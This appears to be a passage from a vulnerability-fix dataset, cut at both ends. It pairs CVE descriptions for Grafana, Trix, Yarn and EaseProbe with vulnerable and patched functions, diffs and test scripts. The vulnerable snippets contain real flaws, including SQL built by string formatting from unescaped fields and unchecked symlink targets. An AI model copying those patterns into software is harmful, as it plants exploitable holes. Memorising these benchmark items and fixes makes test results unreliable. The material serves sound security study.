{\n\t\t\treturn nil, err\n\t\t}\n\t\tcnnstr += \"&tls=\" + tlsConfigString\n\t}\n\n\tif setting.Env == setting.DEV {\n\t\tlogger.Debug(\"getEngine\", \"connection\", cnnstr)\n\t}\n\n\tconfig := sqleng.SqlQueryEndpointConfiguration{\n\t\tDriverName: \"mysql\",\n\t\tConnectionString: cnnstr,\n\t\tDatasource: datasource,\n\t\tTimeColumnNames: []string{\"time\", \"time_sec\"},\n\t\tMetricColumnTypes: []string{\"CHAR\", \"VARCHAR\", \"TINYTEXT\", \"TEXT\", \"MEDIUMTEXT\", \"LONGTEXT\"},\n\t}\n\n\trowTransformer := mysqlQueryResultTransformer{\n\t\tlog: logger,\n\t}\n\n\treturn sqleng.NewSqlQueryEndpoint(&config, &rowTransformer, newMysqlMacroEngine(logger), logger)\n}"}, {"id": "fix_go_30_2", "commit": "19dbd27c5caa1a160bd5854b65a4e1fe2a8a4f00", "file_path": "pkg/tsdb/mysql/mysql.go", "start_line": 27, "end_line": 30, "snippet": "func characterEscape(s string, escapeChar string) string {\n\treturn strings.Replace(s, escapeChar, url.QueryEscape(escapeChar), -1)\n}\n"}], "vul_patch": "--- a/pkg/tsdb/mysql/mysql.go\n+++ b/pkg/tsdb/mysql/mysql.go\n@@ -5,12 +5,13 @@\n \tif strings.HasPrefix(datasource.Url, \"/\") {\n \t\tprotocol = \"unix\"\n \t}\n+\n \tcnnstr := fmt.Sprintf(\"%s:%s@%s(%s)/%s?collation=utf8mb4_unicode_ci&parseTime=true&loc=UTC&allowNativePasswords=true\",\n-\t\tdatasource.User,\n-\t\tdatasource.DecryptedPassword(),\n+\t\tcharacterEscape(datasource.User, \":\"),\n+\t\tcharacterEscape(datasource.DecryptedPassword(), \"@\"),\n \t\tprotocol,\n-\t\tdatasource.Url,\n-\t\tdatasource.Database,\n+\t\tcharacterEscape(datasource.Url, \")\"),\n+\t\tcharacterEscape(datasource.Database, \"?\"),\n \t)\n \n \ttlsConfig, err := datasource.GetTLSConfig()\n\n--- /dev/null\n+++ b/pkg/tsdb/mysql/mysql.go\n@@ -0,0 +1,3 @@\n+func characterEscape(s string, escapeChar string) string {\n+\treturn strings.Replace(s, escapeChar, url.QueryEscape(escapeChar), -1)\n+}\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2019-19499:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/grafana\nrm -rf ./pkg/tsdb/mysql/mysql_test.go\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ngo test -timeout 30s -run ^TestNewMysqlQueryEndpoint_Escape$ github.com/grafana/grafana/pkg/tsdb/mysql\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2019-19499:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/grafana\ngit apply --whitespace=nowarn /workspace/fix.patch\ngo test -timeout 30s -run ^TestMySQL$ github.com/grafana/grafana/pkg/tsdb/mysql 2>/dev/null"} {"cve_id": "CVE-2025-21610", "cve_description": "Trix is a what-you-see-is-what-you-get rich text editor for everyday writing. Versions prior to 2.1.12 are vulnerable to cross-site scripting when pasting malicious code in the link field. An attacker could trick the user to copy&paste a malicious `javascript:` URL as a link that would execute arbitrary JavaScript code within the context of the user's session, potentially leading to unauthorized actions being performed or sensitive information being disclosed. Users should upgrade to Trix editor version 2.1.12 or later to receive a patch. In addition to upgrading, affected users can disallow browsers that don't support a Content Security Policy (CSP) as a workaround for this and other cross-site scripting vulnerabilities. Set CSP policies such as script-src 'self' to ensure that only scripts hosted on the same origin are executed, and explicitly prohibit inline scripts using script-src-elem.", "cwe_info": {"CWE-79": {"name": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", "description": "The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users."}}, "repo": "https://github.com/basecamp/trix", "patch_url": ["https://github.com/basecamp/trix/commit/180c8d337f18e1569cea6ef29b4d03ffff5b5faa"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_299_1", "commit": "f4d64c24c82cc4b4810b00dda131bfc2267a79cf", "file_path": "src/trix/controllers/toolbar_controller.js", "start_line": 205, "end_line": 216, "snippet": " setAttribute(dialogElement) {\n const attributeName = getAttributeName(dialogElement)\n const input = getInputForDialog(dialogElement, attributeName)\n if (input.willValidate && !input.checkValidity()) {\n input.setAttribute(\"data-trix-validate\", \"\")\n input.classList.add(\"trix-validate\")\n return input.focus()\n } else {\n this.delegate?.toolbarDidUpdateAttribute(attributeName, input.value)\n return this.hideDialog()\n }\n }"}], "fix_func": [{"id": "fix_js_299_1", "commit": "180c8d337f18e1569cea6ef29b4d03ffff5b5faa", "file_path": "src/trix/controllers/toolbar_controller.js", "start_line": 207, "end_line": 221, "snippet": " setAttribute(dialogElement) {\n const attributeName = getAttributeName(dialogElement)\n const input = getInputForDialog(dialogElement, attributeName)\n\n input.willValidate && input.setCustomValidity(\"\")\n if (input.willValidate && !input.checkValidity() || !this.safeAttribute(input)) {\n input.setCustomValidity(\"Invalid value\")\n input.setAttribute(\"data-trix-validate\", \"\")\n input.classList.add(\"trix-validate\")\n return input.focus()\n } else {\n this.delegate?.toolbarDidUpdateAttribute(attributeName, input.value)\n return this.hideDialog()\n }\n }"}, {"id": "fix_js_299_2", "commit": "180c8d337f18e1569cea6ef29b4d03ffff5b5faa", "file_path": "src/trix/controllers/toolbar_controller.js", "start_line": 223, "end_line": 230, "snippet": " safeAttribute(input) {\n if (input.hasAttribute(\"data-trix-validate-href\")) {\n return DOMPurify.isValidAttribute(\"a\", \"href\", input.value)\n } else {\n return true\n }\n }\n"}], "vul_patch": "--- a/src/trix/controllers/toolbar_controller.js\n+++ b/src/trix/controllers/toolbar_controller.js\n@@ -1,7 +1,10 @@\n setAttribute(dialogElement) {\n const attributeName = getAttributeName(dialogElement)\n const input = getInputForDialog(dialogElement, attributeName)\n- if (input.willValidate && !input.checkValidity()) {\n+\n+ input.willValidate && input.setCustomValidity(\"\")\n+ if (input.willValidate && !input.checkValidity() || !this.safeAttribute(input)) {\n+ input.setCustomValidity(\"Invalid value\")\n input.setAttribute(\"data-trix-validate\", \"\")\n input.classList.add(\"trix-validate\")\n return input.focus()\n\n--- /dev/null\n+++ b/src/trix/controllers/toolbar_controller.js\n@@ -0,0 +1,7 @@\n+ safeAttribute(input) {\n+ if (input.hasAttribute(\"data-trix-validate-href\")) {\n+ return DOMPurify.isValidAttribute(\"a\", \"href\", input.value)\n+ } else {\n+ return true\n+ }\n+ }\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2019-10773", "cve_description": "In Yarn before 1.21.1, the package install functionality can be abused to generate arbitrary symlinks on the host filesystem by using specially crafted \"bin\" keys. Existing files could be overwritten depending on the current user permission set.", "cwe_info": {"CWE-59": {"name": "Improper Link Resolution Before File Access ('Link Following')", "description": "The product attempts to access a file based on the filename, but it does not properly prevent that filename from identifying a link or shortcut that resolves to an unintended resource."}}, "repo": "https://github.com/yarnpkg/yarn", "patch_url": ["https://github.com/yarnpkg/yarn/commit/039bafd74b7b1a88a53a54f8fa6fa872615e90e7"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_154_1", "commit": "ac04da8", "file_path": "src/util/normalize-manifest/fix.js", "start_line": 26, "end_line": 333, "snippet": "export default (async function(\n info: Dict,\n moduleLoc: string,\n reporter: Reporter,\n warn: WarnFunction,\n looseSemver: boolean,\n): Promise {\n const files = await fs.readdir(moduleLoc);\n\n // clean info.version\n if (typeof info.version === 'string') {\n info.version = semver.clean(info.version, looseSemver) || info.version;\n }\n\n // if name or version aren't set then set them to empty strings\n info.name = info.name || '';\n info.version = info.version || '';\n\n // if the man field is a string then coerce it to an array\n if (typeof info.man === 'string') {\n info.man = [info.man];\n }\n\n // if the keywords field is a string then split it on any whitespace\n if (typeof info.keywords === 'string') {\n info.keywords = info.keywords.split(/\\s+/g);\n }\n\n // if there's no contributors field but an authors field then expand it\n if (!info.contributors && files.indexOf('AUTHORS') >= 0) {\n const authorsFilepath = path.join(moduleLoc, 'AUTHORS');\n const authorsFilestats = await fs.stat(authorsFilepath);\n if (authorsFilestats.isFile()) {\n let authors = await fs.readFile(authorsFilepath);\n authors = authors\n .split(/\\r?\\n/g) // split on lines\n .map((line): string => line.replace(/^\\s*#.*$/, '').trim()) // remove comments\n .filter((line): boolean => !!line); // remove empty lines\n info.contributors = authors;\n }\n }\n\n // expand people fields to objects\n if (typeof info.author === 'string' || typeof info.author === 'object') {\n info.author = normalizePerson(info.author);\n }\n if (Array.isArray(info.contributors)) {\n info.contributors = info.contributors.map(normalizePerson);\n }\n if (Array.isArray(info.maintainers)) {\n info.maintainers = info.maintainers.map(normalizePerson);\n }\n\n // if there's no readme field then load the README file from the cwd\n if (!info.readme) {\n const readmeCandidates = files\n .filter((filename): boolean => {\n const lower = filename.toLowerCase();\n return lower === 'readme' || lower.indexOf('readme.') === 0;\n })\n .sort((filename1, filename2): number => {\n // favor files with extensions\n return filename2.indexOf('.') - filename1.indexOf('.');\n });\n\n for (const readmeFilename of readmeCandidates) {\n const readmeFilepath = path.join(moduleLoc, readmeFilename);\n const readmeFileStats = await fs.stat(readmeFilepath);\n if (readmeFileStats.isFile()) {\n info.readmeFilename = readmeFilename;\n info.readme = await fs.readFile(readmeFilepath);\n break;\n }\n }\n }\n\n // if there's no description then take the first paragraph from the readme\n if (!info.description && info.readme) {\n const desc = extractDescription(info.readme);\n if (desc) {\n info.description = desc;\n }\n }\n\n // support array of engine keys\n if (Array.isArray(info.engines)) {\n const engines = {};\n for (const str of info.engines) {\n if (typeof str === 'string') {\n const [name, ...patternParts] = str.trim().split(/ +/g);\n engines[name] = patternParts.join(' ');\n }\n }\n info.engines = engines;\n }\n\n // if the repository field is a string then assume it's a git repo and expand it\n if (typeof info.repository === 'string') {\n info.repository = {\n type: 'git',\n url: info.repository,\n };\n }\n\n const repo = info.repository;\n\n // explode info.repository.url if it's a hosted git shorthand\n if (repo && typeof repo === 'object' && typeof repo.url === 'string') {\n repo.url = hostedGitFragmentToGitUrl(repo.url, reporter);\n }\n\n // allow bugs to be specified as a string, expand it to an object with a single url prop\n if (typeof info.bugs === 'string') {\n info.bugs = {url: info.bugs};\n }\n\n // normalize homepage url to http\n if (typeof info.homepage === 'string') {\n const parts = url.parse(info.homepage);\n parts.protocol = parts.protocol || 'http:';\n if (parts.pathname && !parts.hostname) {\n parts.hostname = parts.pathname;\n parts.pathname = '';\n }\n info.homepage = url.format(parts);\n }\n\n // if the `bin` field is as string then expand it to an object with a single property\n // based on the original `bin` field and `name field`\n // { name: \"foo\", bin: \"cli.js\" } -> { name: \"foo\", bin: { foo: \"cli.js\" } }\n if (typeof info.name === 'string' && typeof info.bin === 'string' && info.bin.length > 0) {\n // Remove scoped package name for consistency with NPM's bin field fixing behaviour\n const name = info.name.replace(/^@[^\\/]+\\//, '');\n info.bin = {[name]: info.bin};\n }\n\n // bundleDependencies is an alias for bundledDependencies\n if (info.bundledDependencies) {\n info.bundleDependencies = info.bundledDependencies;\n delete info.bundledDependencies;\n }\n\n let scripts: Object;\n\n // dummy script object to shove file inferred scripts onto\n if (info.scripts && typeof info.scripts === 'object') {\n scripts = info.scripts;\n } else {\n scripts = {};\n }\n\n // if there's a server.js file and no start script then set it to `node server.js`\n if (!scripts.start && files.indexOf('server.js') >= 0) {\n scripts.start = 'node server.js';\n }\n\n // if there's a binding.gyp file and no install script then set it to `node-gyp rebuild`\n if (!scripts.install && files.indexOf('binding.gyp') >= 0) {\n scripts.install = 'node-gyp rebuild';\n }\n\n // set scripts if we've polluted the empty object\n if (Object.keys(scripts).length) {\n info.scripts = scripts;\n }\n\n const dirs = info.directories;\n\n if (dirs && typeof dirs === 'object') {\n const binDir = dirs.bin;\n\n if (!info.bin && binDir && typeof binDir === 'string') {\n const bin = (info.bin = {});\n const fullBinDir = path.join(moduleLoc, binDir);\n\n if (await fs.exists(fullBinDir)) {\n for (const scriptName of await fs.readdir(fullBinDir)) {\n if (scriptName[0] === '.') {\n continue;\n }\n bin[scriptName] = path.join('.', binDir, scriptName);\n }\n } else {\n warn(reporter.lang('manifestDirectoryNotFound', binDir, info.name));\n }\n }\n\n const manDir = dirs.man;\n\n if (!info.man && typeof manDir === 'string') {\n const man = (info.man = []);\n const fullManDir = path.join(moduleLoc, manDir);\n\n if (await fs.exists(fullManDir)) {\n for (const filename of await fs.readdir(fullManDir)) {\n if (/^(.*?)\\.[0-9]$/.test(filename)) {\n man.push(path.join('.', manDir, filename));\n }\n }\n } else {\n warn(reporter.lang('manifestDirectoryNotFound', manDir, info.name));\n }\n }\n }\n\n delete info.directories;\n\n // normalize licenses field\n const licenses = info.licenses;\n if (Array.isArray(licenses) && !info.license) {\n let licenseTypes = [];\n\n for (let license of licenses) {\n if (license && typeof license === 'object') {\n license = license.type;\n }\n if (typeof license === 'string') {\n licenseTypes.push(license);\n }\n }\n\n licenseTypes = licenseTypes.filter(isValidLicense);\n\n if (licenseTypes.length === 1) {\n info.license = licenseTypes[0];\n } else if (licenseTypes.length) {\n info.license = `(${licenseTypes.join(' OR ')})`;\n }\n }\n\n const license = info.license;\n\n // normalize license\n if (license && typeof license === 'object') {\n info.license = license.type;\n }\n\n // get license file\n const licenseFile = files.find((filename): boolean => {\n const lower = filename.toLowerCase();\n return (\n lower === 'license' || lower.startsWith('license.') || lower === 'unlicense' || lower.startsWith('unlicense.')\n );\n });\n if (licenseFile) {\n const licenseFilepath = path.join(moduleLoc, licenseFile);\n const licenseFileStats = await fs.stat(licenseFilepath);\n if (licenseFileStats.isFile()) {\n const licenseContent = await fs.readFile(licenseFilepath);\n const inferredLicense = inferLicense(licenseContent);\n info.licenseText = licenseContent;\n\n const license = info.license;\n\n if (typeof license === 'string') {\n if (inferredLicense && isValidLicense(inferredLicense) && !isValidLicense(license)) {\n // some packages don't specify their license version but we can infer it based on their license file\n const basicLicense = license.toLowerCase().replace(/(-like|\\*)$/g, '');\n const expandedLicense = inferredLicense.toLowerCase();\n if (expandedLicense.startsWith(basicLicense)) {\n // TODO consider doing something to notify the user\n info.license = inferredLicense;\n }\n }\n } else if (inferredLicense) {\n // if there's no license then infer it based on the license file\n info.license = inferredLicense;\n } else {\n // valid expression to refer to a license in a file\n info.license = `SEE LICENSE IN ${licenseFile}`;\n }\n }\n }\n\n if (typeof info.license === 'string') {\n // sometimes licenses are known by different names, reduce them\n info.license = LICENSE_RENAMES[info.license] || info.license;\n } else if (typeof info.readme === 'string') {\n // the license might be at the bottom of the README\n const inferredLicense = inferLicense(info.readme);\n if (inferredLicense) {\n info.license = inferredLicense;\n }\n }\n\n // get notice file\n const noticeFile = files.find((filename): boolean => {\n const lower = filename.toLowerCase();\n return lower === 'notice' || lower.startsWith('notice.');\n });\n if (noticeFile) {\n const noticeFilepath = path.join(moduleLoc, noticeFile);\n const noticeFileStats = await fs.stat(noticeFilepath);\n if (noticeFileStats.isFile()) {\n info.noticeText = await fs.readFile(noticeFilepath);\n }\n }\n\n for (const dependencyType of MANIFEST_FIELDS) {\n const dependencyList = info[dependencyType];\n if (dependencyList && typeof dependencyList === 'object') {\n delete dependencyList['//'];\n for (const name in dependencyList) {\n dependencyList[name] = dependencyList[name] || '';\n }\n }\n }\n});"}], "fix_func": [{"id": "fix_js_154_1", "commit": "039bafd", "file_path": "src/util/normalize-manifest/fix.js", "start_line": 28, "end_line": 353, "snippet": "export default (async function(\n info: Dict,\n moduleLoc: string,\n reporter: Reporter,\n warn: WarnFunction,\n looseSemver: boolean,\n): Promise {\n const files = await fs.readdir(moduleLoc);\n\n // clean info.version\n if (typeof info.version === 'string') {\n info.version = semver.clean(info.version, looseSemver) || info.version;\n }\n\n // if name or version aren't set then set them to empty strings\n info.name = info.name || '';\n info.version = info.version || '';\n\n // if the man field is a string then coerce it to an array\n if (typeof info.man === 'string') {\n info.man = [info.man];\n }\n\n // if the keywords field is a string then split it on any whitespace\n if (typeof info.keywords === 'string') {\n info.keywords = info.keywords.split(/\\s+/g);\n }\n\n // if there's no contributors field but an authors field then expand it\n if (!info.contributors && files.indexOf('AUTHORS') >= 0) {\n const authorsFilepath = path.join(moduleLoc, 'AUTHORS');\n const authorsFilestats = await fs.stat(authorsFilepath);\n if (authorsFilestats.isFile()) {\n let authors = await fs.readFile(authorsFilepath);\n authors = authors\n .split(/\\r?\\n/g) // split on lines\n .map((line): string => line.replace(/^\\s*#.*$/, '').trim()) // remove comments\n .filter((line): boolean => !!line); // remove empty lines\n info.contributors = authors;\n }\n }\n\n // expand people fields to objects\n if (typeof info.author === 'string' || typeof info.author === 'object') {\n info.author = normalizePerson(info.author);\n }\n if (Array.isArray(info.contributors)) {\n info.contributors = info.contributors.map(normalizePerson);\n }\n if (Array.isArray(info.maintainers)) {\n info.maintainers = info.maintainers.map(normalizePerson);\n }\n\n // if there's no readme field then load the README file from the cwd\n if (!info.readme) {\n const readmeCandidates = files\n .filter((filename): boolean => {\n const lower = filename.toLowerCase();\n return lower === 'readme' || lower.indexOf('readme.') === 0;\n })\n .sort((filename1, filename2): number => {\n // favor files with extensions\n return filename2.indexOf('.') - filename1.indexOf('.');\n });\n\n for (const readmeFilename of readmeCandidates) {\n const readmeFilepath = path.join(moduleLoc, readmeFilename);\n const readmeFileStats = await fs.stat(readmeFilepath);\n if (readmeFileStats.isFile()) {\n info.readmeFilename = readmeFilename;\n info.readme = await fs.readFile(readmeFilepath);\n break;\n }\n }\n }\n\n // if there's no description then take the first paragraph from the readme\n if (!info.description && info.readme) {\n const desc = extractDescription(info.readme);\n if (desc) {\n info.description = desc;\n }\n }\n\n // support array of engine keys\n if (Array.isArray(info.engines)) {\n const engines = {};\n for (const str of info.engines) {\n if (typeof str === 'string') {\n const [name, ...patternParts] = str.trim().split(/ +/g);\n engines[name] = patternParts.join(' ');\n }\n }\n info.engines = engines;\n }\n\n // if the repository field is a string then assume it's a git repo and expand it\n if (typeof info.repository === 'string') {\n info.repository = {\n type: 'git',\n url: info.repository,\n };\n }\n\n const repo = info.repository;\n\n // explode info.repository.url if it's a hosted git shorthand\n if (repo && typeof repo === 'object' && typeof repo.url === 'string') {\n repo.url = hostedGitFragmentToGitUrl(repo.url, reporter);\n }\n\n // allow bugs to be specified as a string, expand it to an object with a single url prop\n if (typeof info.bugs === 'string') {\n info.bugs = {url: info.bugs};\n }\n\n // normalize homepage url to http\n if (typeof info.homepage === 'string') {\n const parts = url.parse(info.homepage);\n parts.protocol = parts.protocol || 'http:';\n if (parts.pathname && !parts.hostname) {\n parts.hostname = parts.pathname;\n parts.pathname = '';\n }\n info.homepage = url.format(parts);\n }\n\n // if the `bin` field is as string then expand it to an object with a single property\n // based on the original `bin` field and `name field`\n // { name: \"foo\", bin: \"cli.js\" } -> { name: \"foo\", bin: { foo: \"cli.js\" } }\n if (typeof info.name === 'string' && typeof info.bin === 'string' && info.bin.length > 0) {\n // Remove scoped package name for consistency with NPM's bin field fixing behaviour\n const name = info.name.replace(/^@[^\\/]+\\//, '');\n info.bin = {[name]: info.bin};\n }\n\n // Validate that the bin entries reference only files within their package, and that\n // their name is a valid file name\n if (typeof info.bin === 'object' && info.bin !== null) {\n const bin: Object = info.bin;\n for (const key of Object.keys(bin)) {\n const target = bin[key];\n if (!VALID_BIN_KEYS.test(key) || !isValidBin(target)) {\n delete bin[key];\n warn(reporter.lang('invalidBinEntry', info.name, key));\n } else {\n bin[key] = path.normalize(target);\n }\n }\n } else if (typeof info.bin !== 'undefined') {\n delete info.bin;\n warn(reporter.lang('invalidBinField', info.name));\n }\n\n // bundleDependencies is an alias for bundledDependencies\n if (info.bundledDependencies) {\n info.bundleDependencies = info.bundledDependencies;\n delete info.bundledDependencies;\n }\n\n let scripts: Object;\n\n // dummy script object to shove file inferred scripts onto\n if (info.scripts && typeof info.scripts === 'object') {\n scripts = info.scripts;\n } else {\n scripts = {};\n }\n\n // if there's a server.js file and no start script then set it to `node server.js`\n if (!scripts.start && files.indexOf('server.js') >= 0) {\n scripts.start = 'node server.js';\n }\n\n // if there's a binding.gyp file and no install script then set it to `node-gyp rebuild`\n if (!scripts.install && files.indexOf('binding.gyp') >= 0) {\n scripts.install = 'node-gyp rebuild';\n }\n\n // set scripts if we've polluted the empty object\n if (Object.keys(scripts).length) {\n info.scripts = scripts;\n }\n\n const dirs = info.directories;\n\n if (dirs && typeof dirs === 'object') {\n const binDir = dirs.bin;\n\n if (!info.bin && binDir && typeof binDir === 'string') {\n const bin = (info.bin = {});\n const fullBinDir = path.join(moduleLoc, binDir);\n\n if (await fs.exists(fullBinDir)) {\n for (const scriptName of await fs.readdir(fullBinDir)) {\n if (scriptName[0] === '.') {\n continue;\n }\n bin[scriptName] = path.join('.', binDir, scriptName);\n }\n } else {\n warn(reporter.lang('manifestDirectoryNotFound', binDir, info.name));\n }\n }\n\n const manDir = dirs.man;\n\n if (!info.man && typeof manDir === 'string') {\n const man = (info.man = []);\n const fullManDir = path.join(moduleLoc, manDir);\n\n if (await fs.exists(fullManDir)) {\n for (const filename of await fs.readdir(fullManDir)) {\n if (/^(.*?)\\.[0-9]$/.test(filename)) {\n man.push(path.join('.', manDir, filename));\n }\n }\n } else {\n warn(reporter.lang('manifestDirectoryNotFound', manDir, info.name));\n }\n }\n }\n\n delete info.directories;\n\n // normalize licenses field\n const licenses = info.licenses;\n if (Array.isArray(licenses) && !info.license) {\n let licenseTypes = [];\n\n for (let license of licenses) {\n if (license && typeof license === 'object') {\n license = license.type;\n }\n if (typeof license === 'string') {\n licenseTypes.push(license);\n }\n }\n\n licenseTypes = licenseTypes.filter(isValidLicense);\n\n if (licenseTypes.length === 1) {\n info.license = licenseTypes[0];\n } else if (licenseTypes.length) {\n info.license = `(${licenseTypes.join(' OR ')})`;\n }\n }\n\n const license = info.license;\n\n // normalize license\n if (license && typeof license === 'object') {\n info.license = license.type;\n }\n\n // get license file\n const licenseFile = files.find((filename): boolean => {\n const lower = filename.toLowerCase();\n return (\n lower === 'license' || lower.startsWith('license.') || lower === 'unlicense' || lower.startsWith('unlicense.')\n );\n });\n if (licenseFile) {\n const licenseFilepath = path.join(moduleLoc, licenseFile);\n const licenseFileStats = await fs.stat(licenseFilepath);\n if (licenseFileStats.isFile()) {\n const licenseContent = await fs.readFile(licenseFilepath);\n const inferredLicense = inferLicense(licenseContent);\n info.licenseText = licenseContent;\n\n const license = info.license;\n\n if (typeof license === 'string') {\n if (inferredLicense && isValidLicense(inferredLicense) && !isValidLicense(license)) {\n // some packages don't specify their license version but we can infer it based on their license file\n const basicLicense = license.toLowerCase().replace(/(-like|\\*)$/g, '');\n const expandedLicense = inferredLicense.toLowerCase();\n if (expandedLicense.startsWith(basicLicense)) {\n // TODO consider doing something to notify the user\n info.license = inferredLicense;\n }\n }\n } else if (inferredLicense) {\n // if there's no license then infer it based on the license file\n info.license = inferredLicense;\n } else {\n // valid expression to refer to a license in a file\n info.license = `SEE LICENSE IN ${licenseFile}`;\n }\n }\n }\n\n if (typeof info.license === 'string') {\n // sometimes licenses are known by different names, reduce them\n info.license = LICENSE_RENAMES[info.license] || info.license;\n } else if (typeof info.readme === 'string') {\n // the license might be at the bottom of the README\n const inferredLicense = inferLicense(info.readme);\n if (inferredLicense) {\n info.license = inferredLicense;\n }\n }\n\n // get notice file\n const noticeFile = files.find((filename): boolean => {\n const lower = filename.toLowerCase();\n return lower === 'notice' || lower.startsWith('notice.');\n });\n if (noticeFile) {\n const noticeFilepath = path.join(moduleLoc, noticeFile);\n const noticeFileStats = await fs.stat(noticeFilepath);\n if (noticeFileStats.isFile()) {\n info.noticeText = await fs.readFile(noticeFilepath);\n }\n }\n\n for (const dependencyType of MANIFEST_FIELDS) {\n const dependencyList = info[dependencyType];\n if (dependencyList && typeof dependencyList === 'object') {\n delete dependencyList['//'];\n for (const name in dependencyList) {\n dependencyList[name] = dependencyList[name] || '';\n }\n }\n }\n});"}, {"id": "fix_js_154_2", "commit": "039bafd", "file_path": "src/util/normalize-manifest/fix.js", "start_line": 15, "end_line": 15, "snippet": "const VALID_BIN_KEYS = /^[a-z0-9_-]+$/i;"}, {"id": "fix_js_154_3", "commit": "039bafd", "file_path": "src/util/normalize-manifest/util.js", "start_line": 8, "end_line": 8, "snippet": "const PARENT_PATH = /^\\.\\.([\\\\\\/]|$)/;"}, {"id": "fix_js_154_4", "commit": "039bafd", "file_path": "src/util/normalize-manifest/util.js", "start_line": 14, "end_line": 16, "snippet": "export function isValidBin(bin: string): boolean {\n return !path.isAbsolute(bin) && !PARENT_PATH.test(path.normalize(bin));\n}"}], "vul_patch": "--- a/src/util/normalize-manifest/fix.js\n+++ b/src/util/normalize-manifest/fix.js\n@@ -132,6 +132,24 @@\n // Remove scoped package name for consistency with NPM's bin field fixing behaviour\n const name = info.name.replace(/^@[^\\/]+\\//, '');\n info.bin = {[name]: info.bin};\n+ }\n+\n+ // Validate that the bin entries reference only files within their package, and that\n+ // their name is a valid file name\n+ if (typeof info.bin === 'object' && info.bin !== null) {\n+ const bin: Object = info.bin;\n+ for (const key of Object.keys(bin)) {\n+ const target = bin[key];\n+ if (!VALID_BIN_KEYS.test(key) || !isValidBin(target)) {\n+ delete bin[key];\n+ warn(reporter.lang('invalidBinEntry', info.name, key));\n+ } else {\n+ bin[key] = path.normalize(target);\n+ }\n+ }\n+ } else if (typeof info.bin !== 'undefined') {\n+ delete info.bin;\n+ warn(reporter.lang('invalidBinField', info.name));\n }\n \n // bundleDependencies is an alias for bundledDependencies\n\n--- /dev/null\n+++ b/src/util/normalize-manifest/fix.js\n@@ -0,0 +1 @@\n+const VALID_BIN_KEYS = /^[a-z0-9_-]+$/i;\n\n--- /dev/null\n+++ b/src/util/normalize-manifest/fix.js\n@@ -0,0 +1 @@\n+const PARENT_PATH = /^\\.\\.([\\\\\\/]|$)/;\n\n--- /dev/null\n+++ b/src/util/normalize-manifest/fix.js\n@@ -0,0 +1,3 @@\n+export function isValidBin(bin: string): boolean {\n+ return !path.isAbsolute(bin) && !PARENT_PATH.test(path.normalize(bin));\n+}\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-33967", "cve_description": "EaseProbe is a tool that can do health/status checking. An SQL injection issue was discovered in EaseProbe before 2.1.0 when using MySQL/PostgreSQL data checking. This problem has been fixed in v2.1.0.", "cwe_info": {"CWE-89": {"name": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')", "description": "The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data."}}, "repo": "https://github.com/megaease/easeprobe", "patch_url": ["https://github.com/megaease/easeprobe/commit/caaf5860df2aaa76acd29bc40ec9a578d0b1d6e1"], "programing_language": "Go", "vul_func": [{"id": "vul_go_26_2", "commit": "0e148b8", "file_path": "probe/client/mysql/mysql.go", "start_line": 156, "end_line": 176, "snippet": "func (r *MySQL) getSQL(str string) (string, error) {\n\tif len(strings.TrimSpace(str)) == 0 {\n\t\treturn \"\", fmt.Errorf(\"Empty SQL data\")\n\t}\n\tfields := strings.Split(str, \":\")\n\tif len(fields) != 5 {\n\t\treturn \"\", fmt.Errorf(\"Invalid SQL data - [%s]. (syntax: database:table:field:key:value)\", str)\n\t}\n\tdb := fields[0]\n\ttable := fields[1]\n\tfield := fields[2]\n\tkey := fields[3]\n\tvalue := fields[4]\n\t//check value is int or not\n\tif _, err := strconv.Atoi(value); err != nil {\n\t\treturn \"\", fmt.Errorf(\"Invalid SQL data - [%s], the value must be int\", str)\n\t}\n\n\tsql := fmt.Sprintf(\"SELECT %s FROM %s.%s WHERE %s = %s\", field, db, table, key, value)\n\treturn sql, nil\n}"}], "fix_func": [{"id": "fix_go_26_1", "commit": "caaf586", "file_path": "probe/client/mysql/mysql.go", "start_line": 171, "end_line": 191, "snippet": "func (r *MySQL) getSQL(str string) (string, error) {\n\tif len(strings.TrimSpace(str)) == 0 {\n\t\treturn \"\", fmt.Errorf(\"Empty SQL data\")\n\t}\n\tfields := strings.Split(str, \":\")\n\tif len(fields) != 5 {\n\t\treturn \"\", fmt.Errorf(\"Invalid SQL data - [%s]. (syntax: database:table:field:key:value)\", str)\n\t}\n\tdb := global.EscapeQuote(fields[0])\n\ttable := global.EscapeQuote(fields[1])\n\tfield := global.EscapeQuote(fields[2])\n\tkey := global.EscapeQuote(fields[3])\n\tvalue := global.EscapeQuote(fields[4])\n\t//check value is int or not\n\tif _, err := strconv.Atoi(value); err != nil {\n\t\treturn \"\", fmt.Errorf(\"Invalid SQL data - [%s], the value must be int\", str)\n\t}\n\n\tsql := fmt.Sprintf(\"SELECT `%s` FROM `%s`.`%s` WHERE `%s` = %s\", field, db, table, key, value)\n\treturn sql, nil\n}"}, {"id": "fix_go_26_2", "commit": "caaf586", "file_path": "global/global.go", "start_line": 314, "end_line": 332, "snippet": "\n// EscapeQuote escape the string the single quote, double quote, and backtick\nfunc EscapeQuote(str string) string {\n\ttype Escape struct {\n\t\tFrom string\n\t\tTo string\n\t}\n\tescape := []Escape{\n\t\t{From: \"`\", To: \"\"}, // remove the backtick\n\t\t{From: `\\`, To: `\\\\`},\n\t\t{From: `'`, To: `\\'`},\n\t\t{From: `\"`, To: `\\\"`},\n\t}\n\n\tfor _, e := range escape {\n\t\tstr = strings.ReplaceAll(str, e.From, e.To)\n\t}\n\treturn str\n}"}], "vul_patch": "--- a/probe/client/mysql/mysql.go\n+++ b/global/global.go\n@@ -1,21 +1,19 @@\n-func (r *MySQL) getSQL(str string) (string, error) {\n-\tif 